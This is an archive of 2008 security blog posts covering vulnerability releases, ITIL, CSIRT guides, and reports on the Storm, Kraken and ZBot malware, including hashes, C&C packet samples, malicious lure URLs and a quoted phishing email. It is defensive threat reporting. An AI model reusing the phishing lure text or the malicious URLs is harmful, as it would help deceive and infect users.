Opera vulnerabilities
Macrovision InstallShield OCI Untrusted Library Loading Vulnerability
phpMyAdmin vulnerability
Lighttpd
Wireshark
Asterisk Invalid RTP Payload Type Number Memory Corruption
Windows DNS Spoofing vulnerability (MS08-020)
hxvz.dll ActiveX vulnerability (MS08-023)
Microsoft Project vulnerability (MS08-018)
Windows kernel user mode callback vulnerability (MS08-025)
Visio vulnerabilities (MS08-019)
VBScript and JScript engine script decoding vulnerability (MS08-022)

New exploits in this version:

Solaris rpc.ypupdated exploit
MDaemon IMAP FETCH exploit
Microsoft Office memory corruption exploit
Cisco UCP CSuserCGI.exe exploit

Download basic release

Previous articles:

at 14.4.08

It's worth checking out the SANS Reading Room regularly. There are some real interesting topics that appear in there:

Previous articles:

at 14.4.08

Another "Keep it simple" technique, this time from Guy Kawasaki. I have seen a video from him before as an example of a good presentation (The art of Innovation) but I didn't see his 10/20/30 rule before.

I found a lot of other presentations practices on the blog of Jim MacLennan in "The Good, The Bad and The Ugly of Powerpoint" and it gives a very nice overview:

Presentation Zen: by Garr Reynolds, has a different approach, well at least of late - he is reviewing / talking about different presentation "methods" / styles. Some of this stuff is worth reviewing - especially if you are working to get visibility / buy-in, trying to rise above the clutter of standard corporate presentations.
The Monta Method - refugee from a game show, but it pulls in the audience, gets them engaged
The Godin Method - focuses on visuals that catalyze strong ideas; freely admits that presenting is selling
Hey, that's an idea that not enough folks embrace! Way too many corporate presentations are just slides filled with long text, read aloud by the presenter - PowerPoint as Big-Text Word Processor (independent validation on this and other classic PPT issues problems - see Johansson's post)
The Kawasaki Method - ten slides, ten major ideas. A nice way to address the "eating an elephant" issue that many presentations struggle with - how to chunk up the information into bite-sized pieces
The Takahashi Method - Apparently, also known as the Lessig Method; One word per slide, keep the pictures simple
One stellar example of this approach has been pointed to by many - first citing I saw was BoingBoing - by Dick Hardt, founder and CEO of Sxip, on Identity 2.0. Immediately engaging, really does an excellent job of explaining a not-obvious concept, and the style really appeals to the digerati.
The bigger topic at hand here - Identity 2.0 and the macro topic Web 2.0 - has some interesting reading available as well - interesting, worth diving into if you are looking / re-looking into the relevance of the internet for new and established business
Death to Bad Powerpoint: yet another site that laments the lack of style in most PPTs, but this one has had some good posts, including a pointer to a terrific 10 Commandments article, which is the best simple list of critical things you must / must not do - my favorite is "avoid reading your slides", something that really drives me up a wall. He's also citing a 2003 article that places a cost on time spent in meetings.

Read the entire article for his other views on presentations. By itself, his blog has many other interesting articles.

Related articles:

at 14.4.08

There are a lot of security conferences and of course, you cannot visit them all. Luckily, some of them record the presentations and provide them online like Defcon 15 or 24C4. Put together, that's quite some hours of video. How will we find the time to watch all of them? Well, we all have moments that we are waiting (for a client, for a train, etc... ) and maybe we don't always have our laptop with us.

That is what I like about the latest generation of iPods and iPod Touch: playback of video!! Especially, the iPhone Touch has a very nice display to watch video and it fits in my inside pocket.
Just download the freeware Videora iPod Converter 3.07 from Red Kawa and convert the video for your iPod. Doing this, I was able to watch quite some video from Defcon15 recently like Pen-testing Wi-Fi , How to be a WiFi Ninja, Dirty Secrets of the Security Industry, Virtualization: Enough holes to work Vegas and some others. Just try it.

Related articles:

at 13.4.08

This week, I found the latest issue of Hakin9 in my (snail) mail. I took a subscription a few months ago and I haven't regretted it. Topics of this month's issue:

Pentest Labs Using LiveCDs...
Best Practices for Secure Shell...
Cracking LDAP Salted SHA Hashes...
Javascript Obfuscation Techniques...
Breaking in Add-on Malwares...
Vulnerabilities Due to Type Conversion of Integers...
Authentication and Encryption Techniques...
Consumers Test - We Help You Choose the Most Reliable Anti Virus Program...
Interview with Marcus J. Ranum...
Self Exposure by Richard Bejtlich and Harlan Carvey...

Hakin9 is a bi-monthly publication on IT Security. The magazine is published in English and distributed in all English-spoken countries.

Hakin9 is a source of advanced, practical guidelines regarding the latest hacking methods as well as the ways of securing systems, networks and applications.

What I also love, is that they always include a CD with tools. It's mostly an updated Backtrack 2 with some others tools on it as well as video tutorials.

In this issue, they had a consumer test on Anti-virus software. It didn't surprise me that a few of the big ones like McAfee and Symantec scored lower on the effectiveness scale in their review. On the other hand, they have very good endpoint security (HIDS) and central management Avira seems to have central management but limited to 75 clients. Some gateway products support a second engine and that might be an interesting option to use. You can't have it all I guess. I'll come back to this topic later.

For some more information about the issue, go here.

Related articles:

at 12.4.08

A friend referred me to the CERT's Computer Security Incident Response Team handbook. If you are ever planning to set up a CSIRT, you should have a look at this document:

This document provides guidance on forming and operating a computer security incident response team (CSIRT). In particular, it helps an organization to define and document the nature and scope of a computer security incident handling service, which is the core service of a CSIRT. The document explains the functions that make up the service; how those functions interrelate; and the tools, procedures, and roles necessary to implement the service.
This document also describes how CSIRTs interact with other organizations and how to handle sensitive information. In addition, operational and technical issues are covered, such as equipment, security, and staffing considerations.

This document is intended to provide a valuable resource to both newly forming teams and existing teams whose services, policies, and procedures are not clearly defined or documented. The primary audience for this document is managers who are responsible for the creation or operation of a CSIRT or an incident handling service. It can also be used as a reference for all CSIRT staff, higher level managers, and others who interact with a CSIRT.

There are other documents, you could have a look at. Here is the CERT guide from ENISA :

CERT setting up guide:
http://www.enisa.europa.eu/cert_guide
CERT cooperation guide:
http://www.enisa.europa.eu/cert_cooperation
Inventory of CERTs in Europe:
http://www.enisa.europa.eu/cert_inventor

More details are available in the CERTs Fact Sheet:
http://www.enisa.europa.eu/doc/pdf/FACsheets/CERT_Fact_Sheet.pdf

Related articles:

Cyberattacks and Europen Network and Information Security Agency
Workshop Presentations on Mitigation of Massive Cyberattacks

at 10.4.08

I did talk about Deming, the father of quality management but apparently I haven't mentioned ITIL.

The Information Technology Infrastructure Library (ITIL) is a set of concepts and techniques for managing information technology (IT) infrastructure, development, and operations.

What is the relation to (information) security? Well, the triad of security C-I-A, confidentiality, integrity and availability can be supported by ITIL concepts such as capacity management, problem management, change management etc.....

Since May 2007, version 3 is available and is an extension on version 2. If you want to have a look at the Key Differences Between ITIL v2 and v3, the previous link is a good place to start.

Have also a look on the ILX website, which has a nice introduction video.

For those who want to dive deeper into this framework, you can start with the excellent free resource "E-book An Introductory Overview of ITIL V3 (English version) 0,00EUR".

ITIL v3, published in May 2007, comprises 5 key volumes:

1. Service Strategy

2. Service Design

3. Service Transition

4. Service Operation

5. Continual Service Improvement

Here is the Official ITIL Website and The ITIL Open Guide.

So let's give you 10 ways ITIL can improve information security:

There are a number of important ways that ITIL can improve how organizations implement and manage information security.

ITIL keeps information security business and service focused. Too often, information security is perceived as a "cost center" or "hindrance" to business functions. With ITIL, business process owners and IT negotiate information security services; this ensures that the services are aligned with the business' needs.
ITIL can enable organizations to develop and implement information security in a structured, clear way based on best practices. Information security staff can move from "fire fighting" mode to a more structured and planned approach.
With its requirement for continuous review, ITIL can help ensure that information security measures maintain their effectiveness as requirements, environments, and threats change.
ITIL establishes documented processes and standards (such as SLAs and OLAs) that can be audited and monitored. This can help an organization understand the effectiveness of its information security program and comply with regulatory requirements (for example, HIPAA or Sarbanes Oxley).
ITIL provides a foundation upon which information security can build. It requires a number of best practices - such as Change Management, Configuration Management, and Incident Management - that can significantly improve information security. For example, a considerable number of information security issues are caused by inadequate change management, such as misconfigured servers.
ITIL enables information security staff to discuss information security in terms other groups can understand and appreciate. Many managers can't "relate" to low-level details about encryption or firewall rules, but they are likely to understand and appreciate ITIL concepts such as incorporating information security into defined processes for handling problems, improving service, and maintaining SLAs. ITIL can help managers understand that information security is a key part of having a successful, well-run organization.
The organized ITIL framework prevents the rushed, disorganized implementation of information security measures. ITIL requires designing and building consistent, measurable information security measures into IT services rather than after-the-fact or after an incident. This ultimately saves time, money, and effort.
The reporting required by ITIL keeps an organization's management well informed about the effectiveness of their organization's information security measures. The reporting also allows management to make informed decisions about the risks their organization has.
ITIL defines roles and responsibilities for information security. During an incident, it's clear who will respond and how they will do so.
ITIL establishes a common language for discussing information security. This can allow information security staff to communicate more effectively with internal and external business partners, such as an organization's outsourced security service

Bonus (from Adventures of ITIL Imp):

Related articles:

at 10.4.08

In June 2007, I blogged about the security vulnerabilities in Belgian passports. We were just talking about the ones issued between the end of 2004 and July 2006. The later ones were more secure.

It seems that the newer generation is also flawed. Here is the research paper that describes the problem. Basically, they forgot to define how to answer to invalid requests. This is why every country has their own way. Kind of like the different implementations of a TCP/IP stack which also allows for fingerprinting. The different answers to these invalid questions allows attacks to identify to which country the owner belongs.

From the paper:

The detection is done at the logical level, i.e. by looking at the bytes that an
e-passport sends as reply in response to some carefully chosen commands from the
reader. The attack is able to distinguish e-passports of all countries that we managed
to get hold of: Australia, Belgium, France, Germany, Greece, Italy, the Netherlands,
Poland, Spain, and Sweden. The ease with which we were able to find differences between
these passports, and the huge space of potential fingerprints, suggests that discriminating
between additional countries should not pose any problems, unless there
are countries that have an identical implementation.

Time to wrap it in aluminum foil !! :-)

Previous articles:

at 10.4.08

Maybe it's because of all of the attention 'Kraken' is getting but another malicious spamwave has begun. When talking about convincing users to install something, we have to warn you about Storm Worm (again). It has started a new campaign to convince users to install a video codec called 'Storm Codec' (yes really!!!).

Today the Storm Botnet is spamming out links to its latest website inside love themed emails. As is usual for Storm, the spam emails contain a short message and a link. Some subject lines are 'Just you and me', 'For you...Sweetheart!', 'My heart was stolen' and 'Only you'.
This latest website asks the user to download and run the ‘Storm Codec’. Not surprisingly the files StormCodec.exe and StormCodec8.exe, which are linked to by the image of a media player and the ‘Download it’ link, are in fact Storm variants. (Source: Marshal)
----

Of course, the said “codec” is actually a NUWAR/Storm variant, which Trend Micro already detects as WORM_NUWAR.JQ since April 2.

If the social engineering tactic of using video codecs is familiar, it’s because it is — ZLOB Trojans became infamous because of it, after all (see some detailed analysis here). Thus, the Storm gang’s attempt to venture into the said codec “business” has our researchers speculating whether they are now in cahoots with the ZLOB authors, or that they are trying to take over ZLOB’s niche, much like they did with STRATION when the two first started battling it out late 2006. Or maybe the gang is just trying to reaffirm to their competition that they’re still the one to beat.

In the end though, it’s still the unsuspecting users who become collateral damage of all this brouhaha. Users are thus advised to be wary when visiting Web sites or blogs, especially those that require installation or execution of files. Video files — especially those posted online — almost always do not require video codecs anymore, lest they lose the much coveted site traffic to other sites (YouTube, anyone?). Come to think of it, if someone really loves a person that much, he or she won’t have that person go all through the trouble of finding the appropriate codec, right? (Source:Trendmicro)

The funny thing is that when googling for some more information, I encountered a codec on www.softpedia.com called Storm Codec 7.01.19 made by Storm. The file is a hefty 23MB and the site claims that it is verified and virus free. It's probably too big to upload to virustotal but some of the virusscanners I have also claim it's clean. Maybe a freak coincidence? More experimentation to follow.

Anyway, most users won't know the difference between Storm Codec and some of the real codecs they need to play online media. So educate you peers.

at 10.4.08

As a sidenote to the Audioparasitics podcast, I warned readers to upgrade their Adobe Flash. No time to waitto patch because we are seeing active exploitation through popular sites:

Websense® Security Labs™ has received reports of a malicious Flash banner ad on USATODAY.com, a prominent news web site. The banner ad leads to the download of various spyware and ransomware, appearing as legit anti-virus scanners to the uninitiated.

Without any user interaction, the banner ad causes the browser to be minimized to the bottom right-most corner of the desktop, behind a fake warning popup dialog box. In the screenshot below, we clicked “cancel”.

Even prior to clicking “cancel”, we noticed that the desktop is already receiving data from the verified malicious host--all of this without any user interaction.

Clicking “cancel” still takes the visitor to a fake malware scanner site, which despite the subsequent of clicking “no” or “cancel” to all the popup dialog boxes, leads to a “free” fake scan, which then results in a fake anti-virus scan result page.
The machine we used in our tests were 100% free from malicious code, yet the fake page claimed 12 infections. O RLLY?

It then offers the usual malicious “solution” for download. (Source: Websense)

at 9.4.08

The latest AudioParasitics is out:

Episode 32 - Microsoft Patch Tuesday Special Edition - MS08-018 - MS08-025 are discussed. Craig Schmugar joins Jim and Dave to discuss the security implications of each bulletin.

Oh yeah, so it was Black Tuesday. Here is also a rundown by the Sans ISC.

And last but not least, in "Patch mania, it's not just Patch Tuesday" I said to watch out for upcoming Adobe Flash patches. It's time!

Adobe has released the security bulletin APSB08-11, to address multiple vulnerabilities in Adobe Flash Player 9.0.115.0 and earlier, and 8.0.39.0 and earlier. The vulnerabilities could lead to the potential execution of arbitrary code remotely. Additionally the update includes DNS rebinding attack and cross-domain policy countermeasures.

Please UPGRADE ASAP to Adobe Flash Player version, 9.0.124.0!

at 9.4.08

Symantec has released its Global Internet Security Threat Report Volume XIII (a whopping 105 pages). They also have a shorter executive summary.

Some Core Facts:

What is the value of a UK identity? – Symantec, today announces that UK identities are being bought and sold in bulk-buy special offers on “cyber crime supermarket” style underground economies, according to the latest edition of its Internet Security Threat Report - Volume XIII.

The bi-annual global report found that UK bank account details are being sold on underground economy servers for as little as £5, and are the most commonly advertised item for sale on these “cyber supermarket” black market forums used by criminals to advertise and trade stolen information and services.

Where you live also indicates how attractive your identity is to cyber criminals as the report found that EU identities are in much higher demand, being traded at prices 50 per cent higher than American identities. This is because of the flexibility of their use, since EU citizens are able to travel and conduct business freely throughout Europe making them useful to attackers who can use the identities easily across borders.

The Internet Security Threat Report also found that the higher the bank balance, the more lucrative it will be when sold on the cyber supermarket, with high value business accounts advertised for considerably more than lower balanced consumer ones. Bank accounts that bundled in personal information such as names, addresses and dates of birth were advertised at higher prices than those without this extra information – indicating how identity thieves are adopting a ‘buy-one-get-one-free’ philosophy.

The Symantec report also found that cyber crime is becoming increasingly sophisticated and personalised, with an increase in attacks on the end-user consumer. When it comes to trading, identities have now become a commercial commodity with Symantec observing a new phenomenon of bulk-buying of confidential consumer data – where personal details are packaged up in bargain bundles. For example, during the last six months of 2007, Symantec observed bundles of 50 credit card numbers for sale at £20 (£0.40 each), and 500 credit card bundles for £100 (£0.20 each).

After credit cards, full identities were the third most common item advertised for sale on the cyber supermarket, making up nine percent of all advertised goods, an increase from six percent in the first half of 2007. Symantec observed that identity trading is on the increase with some details being sold for as little as 50p - even stolen eBay accounts are up for grabs.

The variety of personal data for sale is constantly growing as cyber criminals are constantly changing and adapting their methods to introduce new tactics to achieve their goal of identity fraud. The report found that Mailers are now one of the most popular ways cybercriminals have designed to mislead Web users. The constant developments of new methods of attack indicates that the underground economy is a mature one. The personalisation of malicious activity and the price bargains and packages available are also indicators of the economy’s sophistication.

at 9.4.08

After the report of the Kraken botnet from Damballa, several other vendors were skeptic about the report and indicated that it might have been self advertising and that the risk was. But these are competitors? Was this an attempt at Black PR?

Well, instead of just guessing, thanks to Brian Krebs (Washington Post), we have some concrete information.

Apart from that information, the story left many security professionals hungering for more details. Chief among those were: How exactly does Damballa know so precisely how many bots were involved? And how does the company know whether various anti-virus products detect this spam bot as malicious or not?
...
Kraken also uses dynamic DNS services, but adds a twist: The authors include in the genetic makeup of the bot hidden instructions for finding brand new Web site names on the fly. Should security professionals or the dynamic DNS provider succeed in shutting down the domain name used to control the botnet, Kraken randomly creates another one, using an encryption routine built into the bot code.

The reason Damballa knows exactly how many bots are infected with Kraken is that its experts managed to work out the mathematical algorithm Kraken uses to generate dynamic DNS names that will be used in the future to control the botnet. With that information, the company can then go reserve those dynamic DNS names ahead of time, and when the botnet gets around to using them, all of the bots will eventually report to servers Damballa controls.

In fact, if you were to visit this link, which describes in exquisite detail how one variant of the Kraken botnet works, you'd see a list of more than 100 dynamic DNS names at the bottom. Investigate that list a bit further, and you'd find that nearly a third of those point to Internet servers hosted at Georgia Tech, home to many of the Damballa researchers, including the company's chief scientist, David Dagon.
....
Damballa says that in late December 2007 it used Virustotal.com to scan the Kraken code against 32 commercial anti-virus products, and that at the time only 11 of them (34 percent) detected it as malicious -- see the results here (PDF). A more recent scan of the bot code on April 1 (PDF) shows that detection of Kraken among the anti-virus industry has increased, but only slightly -- just 16 of 32 (50 percent) of the anti-virus companies now flag it as bad.

Royal said such dismal detection rates show why anti-virus products are "slowly slipping into a set of security tools whose time has come and gone."

Many folks in the anti-virus and broader Internet security space say Damballa is trying to make a name for itself by hyping this threat, and that Kraken is nothing more than a renamed and repackaged "Bobax," a worm of similar lineage and methods that was discovered several years ago (in February, Security Fix wrote about Damballa research suggesting that the indefatigable "Storm" worm got its start by cannibalizing PCs infected with Bobax).

"We've taken a look at this and it seems the Damballa guys are into rebranding, and that they've simply taken Bobax" and presented it as Kraken, said Dmitri Alperovitch, director of intelligence analysis at Secure Computing, also based in Atlanta.

Regardless of who's right here, this debate between Damballa and the anti-virus industry has happened before and is likely to occur again. That's because the anti-virus industry no longer has the luxury of correctly classifying malicious software: They are doing everything they can just to keep up with the glut of malware being released no the Net each day, and to classify it as malicious.

Read the full article. Thanks Brian !!!!! I have seen some webcasts from Damballa which made some good impressions. I will certainly keep an eye on them.

Previous posts:

UPDATE: SANS ISC has also updated their available information:

Information has just started flowing on the Kraken diary from earlier. As of this moment, I still don't have a sample of this particular malware, but I do have some packet captures of the control traffic.

C&C sends UDP/447 to the victim with packet lengths varying between 66, 115, 116 and 117 bytes. There does not appear to be an obvious pattern in the payload itself. Right now there are about 100 or so hostnames associated with this from dyndns and yi.org. I will publish a list and update this post with that information shortly. According to some malware we believe to be associated with Kraken, it will also use TCP 447 and encode data in some unknown way. (For those with malware zoos, look for MD5s 31b68fe29241d172675ca8c59b97d4f4 and c05eb75e00d54a041a057934979fed6d. Allegedly, MD5 1d51463150db06bc098fef335bc64971 is associated as well). Some other related bins (c1d078b93df31d032cea89f25dc56362, 3a8bd37f9b33de4d29198d125030f587, b0e7ac28f0a899afa0fcdda5f1252675, 1c6d6f727ee55a5797c369f7aa4a0f38, f43bebf91ae2f5cf1f2ad5168bf9d202, ffc2e41d8e729c7b8622a8420767cfb5)

Word on the street is that this may already be detected and it looks like it is just part of the Bobax family of malware related to this article on Dark Reading from last year. It appears that this malware is what Kraken malware is using to infect machines to based on the work of others.

Here are some sample packets (this is payload data only, no header):

0000 4d f4 d5 17 dc 04 c1 2e 31 77 aa 1b 9f 38 a0 8c M.......1w...8..
0010 84 22 24 64 68 9e 4c 48 ."$dh.LH

0000 4d f4 d5 17 dc 04 c1 2e d3 87 b7 0a 47 7c 9c e1 M...........G|..
0010 23 03 96 ed 57 ab 5c ea #...W.\.

0000 4d f4 d5 17 dc 04 c1 2e fe dd e2 19 b8 a5 0a df M...............
0010 9e fc 0d 71 66 d6 b2 15 ...qf...

0000 4d f4 d5 17 dc 04 c1 2e db 88 1d 13 ec 3f 86 36 M............?.6
0010 d5 26 51 9c 60 11 5d f2 .&Q.`.].

You'll notice that the first 8 bytes are the same, those first 8 vary between different IP addresses, but the packets coming from the same IP all have that same first 8 bytes. This looks like some sort of session ID / signature that is used throughout the session.
UPDATE: The md5 that Damballa is saying is associated with this malware is MD5: 1d51463150db06bc098fef335bc64971. I'm working with a copy from Project Malfease and will have an analysis later. A Virus Total scan of this binary came back as 5/32 (with the 5 that did detect doing so in non-descript ways like "suspicious file").

UPDATE 2 (4/8/2008 - 13:29 UTC): First things first, Emerging Threats has some test signatures to detect this botnet C&C traffic. You can see them here.

There are some Threat Expert reports on related malware that should give you a good list of hostnames to work with for right now.

http://www.threatexpert.com/report.aspx?uid=83128ea3-453a-46fe-884b-71d05677d3ed

http://www.threatexpert.com/report.aspx?uid=e32f00bb-6b26-477f-a0d6-307000a31924

http://www.threatexpert.com/report.aspx?uid=2b65a341-7f74-413c-9854-a6aca09450f5

http://www.threatexpert.com/report.aspx?uid=c431073f-4321-4bc0-a219-832a10f4f3a0

http://www.threatexpert.com/report.aspx?uid=d04fcd5b-b221-43d0-8dad-95e64ba57145

http://www.threatexpert.com/report.aspx?uid=63606940-900b-4e26-87d9-7453a1518ed6

http://www.threatexpert.com/report.aspx?uid=52accf15-a173-4f90-9482-b2634c151d87

UPDATE 3: (4/9/08 - 0030 UTC)

Also, Threat Expert has a pretty good write-up on what they have for Kraken. They see that the initial "phone home" is over TCP/447, and subsequent communication is UDP/447. The detection is still look for port 447 traffic crossing your perimeter. That port was used by an old IBM OS for some database stuff. It doesn't appear to have been used in years. Emerging Threats has some sigs (see above), and the UDP packets seem to be pretty consistently 66, 115, 116, or 117 bytes for the *entire packet*.

at 8.4.08

From spylogic.com:

I stumbled upon a pretty cool project mentioned on the insecure.org mailing list called the "Penetration Testing Directory Project". This project aims to be a directory for all things related to Penetration Testing which include tools, methodologies, companies, websites and more. This does seem something like the Hackerpedia, however, this project looks to be more focused penetration testing vs. hacking techniques and tools. Would love to see this project in a wiki type format one day.

at 8.4.08

Non executables files used to be safe to open and only executables files could be dangerous. Those days are long gone and office documents have become sources of virus infections. But which ones are the most dangerous?

The document I analyzed contains other malformed fields that don’t seem to be related to the bug, so we suspect this document was the result of several experiments of fuzzing techniques. Fuzzing file formats and client applications to find new bugs is an activity that still keeps many security researchers busy, but also many malicious-minded hackers. For readers interested in vulnerabilities and targeted attacks, I suggest that you have a look at this Symantec paper. Attackers are always looking for new bugs, because often a simple crash can be transformed into a zero-day weapon used against companies and organizations.

The following chart has been created by analyzing the number of malicious Trojans exploiting file formats in the last year. Word (.doc) seems to still be the preferred attack vector, but recently we observed some other vectors emerging, such as .xls, .pdf, and also Ichitaro documents (.jtd), which are popular in Japan. Once again, our advice is to be extremely careful when opening any type of email attachment, even when they arrive with a file format considered “safe” and non-executable.

Full article from Symantec.

Related articles:

at 7.4.08

Top Infected ASN for March 2008

Infections	AS Name
67771	CHINANET-BACKBONE No.31,Jin-rong Street
24540	CHINA169-BACKBONE CNCGROUP China169 Backbone
13263	CHINANET-SH-AP China Telecom (Group)
8222	DXTNET Beijing Dian-Xin-Tong Network Technologies Co., Ltd.
7602	CNCNET-CN China Netcom Corp.
3772	GOOGLE – Google Inc.
3455	THEPLANET-AS – ThePlanet.com Internet Services, Inc.
2650	CNNIC-GIANT ZhengZhou GIANT Computer Network Technology Co., Ltd
2624	CMNET-V4SHANGHAI-AS-AP Shanghai Mobile Communications Co.,Ltd.
2493	ASN-THEPLANET-4 – ThePlanet.com Internet Services, Inc.

[note] All data provided by Google and Team Cymru.

stopbadware.org provided this list. But wait, don't I know the number 2 in the list from somewhere? Deja vue.

at 7.4.08

In February, it was the turn of MayDay. A bot that was quite good at infiltrating corporations. Now there is a new one: Kraken and it has taken twice the size of Stormworm.

A new botnet twice the size of Storm has ballooned to an army of over 400,000 bots, including machines in the Fortune 500, according to botnet researchers at Damballa.
The so-called Kraken botnet has been spotted in at least 50 Fortune 500 companies and is undetectable in over 80 percent of machines running antivirus software. Kraken appears to be evading detection by a combination of clever obfuscation techniques, including regularly updating its binary code and structuring the code in such a way that hinders any static analysis, says Paul Royal, principal researcher at Damballa.
"It's easy to trace but slow to get antivirus coverage. It seems to imply [the creators] have a good understanding of how AV tools operate and how to evade them," Royal says.
Kraken's successful infiltration of major enterprises is a wakeup call that bots aren't just a consumer problem. Damballa and other botnet experts over the past few months have seen an unsettling rise in bot infections in enterprises.
Royal says like Storm, Kraken so far is mostly being used for spamming the usual scams -- high interest loans, gambling, male enhancement products, pharmacy advertisements, and counterfeit watches, for instance. "But given that it updates its binary, there's no reason it couldn't update itself to a binary that does other things," Royal says. "I'm wondering where this thing is going to go."
...
Just how Kraken is infecting machines is still unclear, but Royal says the malware seems to appear as an image file to the victim. When the victim tries to view the image, the malware is loaded onto his or her machine. "We know the picture... ends in an .exe, which is not shown" to the user, Royal says. (Source: Darkreading.com)

The Sans Internet Stormcenter is asking anyone with more details or samples to report it.

UPDATE: Sans ISC has some updates:

C&C sends UDP/447 to the victim with packet lengths varying between 66, 115, 116 and 117 bytes. There does not appear to be an obvious pattern in the payload itself. Right now there are about 100 or so hostnames associated with this from dyndns and yi.org. I will publish a list and update this post with that information shortly. According to some malware we believe to be associated with Kraken, it will also use TCP 447 and encode data in some unknown way. (For those with malware zoos, look for MD5s 31b68fe29241d172675ca8c59b97d4f4 and c05eb75e00d54a041a057934979fed6d. Allegedly, MD5 1d51463150db06bc098fef335bc64971 is associated as well). Some other related bins (c1d078b93df31d032cea89f25dc56362, 3a8bd37f9b33de4d29198d125030f587, b0e7ac28f0a899afa0fcdda5f1252675, 1c6d6f727ee55a5797c369f7aa4a0f38, f43bebf91ae2f5cf1f2ad5168bf9d202, ffc2e41d8e729c7b8622a8420767cfb5)

Word on the street is that this may already be detected and it looks like it is just part of the Bobax family of malware related to this article on Dark Reading from last year. It appears that this malware is what Kraken malware is using to infect machines to based on the work of others.

Here are some sample packets (this is payload data only, no header):

0000 4d f4 d5 17 dc 04 c1 2e 31 77 aa 1b 9f 38 a0 8c M.......1w...8..
0010 84 22 24 64 68 9e 4c 48 ."$dh.LH

0000 4d f4 d5 17 dc 04 c1 2e d3 87 b7 0a 47 7c 9c e1 M...........G|..
0010 23 03 96 ed 57 ab 5c ea #...W.\.

0000 4d f4 d5 17 dc 04 c1 2e fe dd e2 19 b8 a5 0a df M...............
0010 9e fc 0d 71 66 d6 b2 15 ...qf...

0000 4d f4 d5 17 dc 04 c1 2e db 88 1d 13 ec 3f 86 36 M............?.6
0010 d5 26 51 9c 60 11 5d f2 .&Q.`.].

You'll notice that the first 8 bytes are the same, those first 8 vary between different IP addresses, but the packets coming from the same IP all have that same first 8 bytes. This looks like some sort of session ID / signature that is used throughout the session.

Related articles:

UPDATE (09/04/2007): Some more details on the 'Kraken' bot, fact or fiction?

at 7.4.08

We have seen cases in the UK and the Netherlands were people, surfing on an access point of another, were arrested. Now it's our turn.

In the Belgian East-Flemish city Sint-Gillis-Waas, a 22 year old man was arrested because he was surfing on the wireless access point from a local resident.
The young men from Sint-Gillis-Waas was parked in his car in front of the house in the Margriet street of the resident. The local police arrested the suspect and after registration of the facts, let him go.

It is not known if the wireless access of the resident was secured or not. Nevertheless, the young men must justify himself before a judge on the account of hacking. Gaining unuathorized access to a computernetwork in any situation is still a breach of IT Law.

Connecting by accident onto your neighbours AP is one thing, sitting in your car in front of a house is another. Even if there was no malicious intent, it's just not allowed. So be carefull what you do with your laptop or PDA.

You could discuss the morality of the whole thing but that has been done before:

http://www.schneier.com/blog/archives/2006/06/schneier_asks_t.html
or

http://www.schneier.com/blog/archives/2008/01/my_open_wireles_1.html

There was also some ongoing local discussion:

The Radio 1 program Peeters & Pichal had a lot of attention on the topic of wireless networks (wardrivers.be).

On the site of Tik vzw (belgian consumergroup) there is also an ongoing discussion.

Bonus: Old documentary clip from Terzake (Belgian TV)

UPDATE: By the way, the picture above is not from this story and just some funny picture I found. But the story is real.

Het Nieuwsblad
Het belang van Limburg
De Standaard
Tweakers.net

at 7.4.08

Last weekend, there was another banking Trojan spamrun focussed at the Netherlands, Switzerland, Latvia and Finland. The scam mail appears to be from an attractive looking Russian student girl looking for a sex partner. The mail entices the recipient to check out her photographs at a site called livejournalhelper.cn (China). Here is a sample of the Swiss targeted email (in German):

From: ruffiansma08@healthwi.com

To: dau@rbl.abuse.ch

Subject: Switzherland-Polina
Hallo, Mich rufen Polina. Ich bin Studentin und bin in die Swiss zum Studium gekommen.

Jetzt bin ich auf der Suche nach einem Freund und Sexpartner. Alles was ich brauche, ist ein guter Mann. Sie sollen ernst, solide, gescheit sein.
Machen sie kenntlich, wenn Sie sich mit mir treffen wollen
Sie konnen also einfach mein Freund sein. Sie konnen sich meine Fotos auf meiner Startseite http://www.livejournalfuac.cn/pol_ch/

NUR ERNSTLICHE ANTRÄGE BITTE!
MIT KÜSSEN, ALICE

Unfortunately, the site has only thumbnails of Ms. Polinka's pictures and when you try to view them in a larger size, you get an error message. The user is asked to install a missing plugin in order to see the pictures. The plugin is of course a man-in-the-middle banking trojan and a variant on a Trojan we have seen before.

F-Secure has an analysis of the original Trojan used last month:

Trojan-Spy:W32/ZBot.HS was discovered on February 20th 2008. ZBot.HS targets a Finnish bank and utilized spam written in Finnish.

The website designs have been used in the past. There are previous examples of German language versions targeting individuals in Switzerland.

ZBot variants use modular components (configuration and commands) downloaded from the Internet after installation. The components are encrypted and hinder full analysis as the ZBot requires an online connection and all components to determine full functionality.

Offline analysis of this variant within our isolated network displays typical banking trojan behavior.

Browser activity is now monitored for multiple ".fi", ".ch", ".de", ".nl" and ".com" bank URL addresses.

Comprehensive analysis of this variant has been completed.

The remote server URL contains a top-level domain of ".ru". The server is hosted in Turkey as of February 21, 2008.

Logging online banking information is the primary payload of Trojan-Spy:W32/Zbot variants.

ZBot searches the following string by default:

https://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome

Read the full technical analysis.

Their previous analysis, described the remote server URL to be .ru but hosted in Turkey. That sounded a lot like the Russion Business Network.

I had a look at this version from livejournalhelper.cn. The page looked very similar to the one described in the analysis from F-secure. The plugin that was asked to be installed was also "iPIX-install.exe".

I uploaded it to virustotal and got 0/32 results.

File: iPIX-install.exe
File size: 69140 bytes
MD5...: 7618bb4b84831d5cbaef8a2fa517f68c

Strange, so I tried to execute it in a sandbox to check what would happen. Nothing. It seemed to be a corrupt version of the Trojan. I re-downloaded it from another (fresh) location and PC and it gave another binary. MD5: 0c208229c50beacc234b8f509ccd79c0

AhnLab-V3 2008.4.4.1 2008.04.04 -
AntiVir 7.6.0.81 2008.04.04 TR/Crypt.XPACK.Gen
Authentium 4.93.8 2008.04.05 -
Avast 4.7.1098.0 2008.04.04 -
AVG 7.5.0.516 2008.04.05 Dropper.Delf
BitDefender 7.2 2008.04.05 -
CAT-QuickHeal 9.50 2008.04.05 -
ClamAV 0.92.1 2008.04.05 -
DrWeb 4.44.0.09170 2008.04.05 -
eSafe 7.0.15.0 2008.04.01 suspicious Trojan/Worm
eTrust-Vet 31.3.5672 2008.04.04 -
Ewido 4.0 2008.04.05 -
F-Prot 4.4.2.54 2008.04.05 -
F-Secure 6.70.13260.0 2008.04.05 Trojan-Dropper.Win32.Agent.ocn
FileAdvisor 1 2008.04.05 -
Fortinet 3.14.0.0 2008.04.05 -
Ikarus T3.1.1.20 2008.04.05 Packer.Malware.FriCryptor.B
Kaspersky 7.0.0.125 2008.04.05 Trojan-Dropper.Win32.Agent.ocn
McAfee 5267 2008.04.04 New Win32
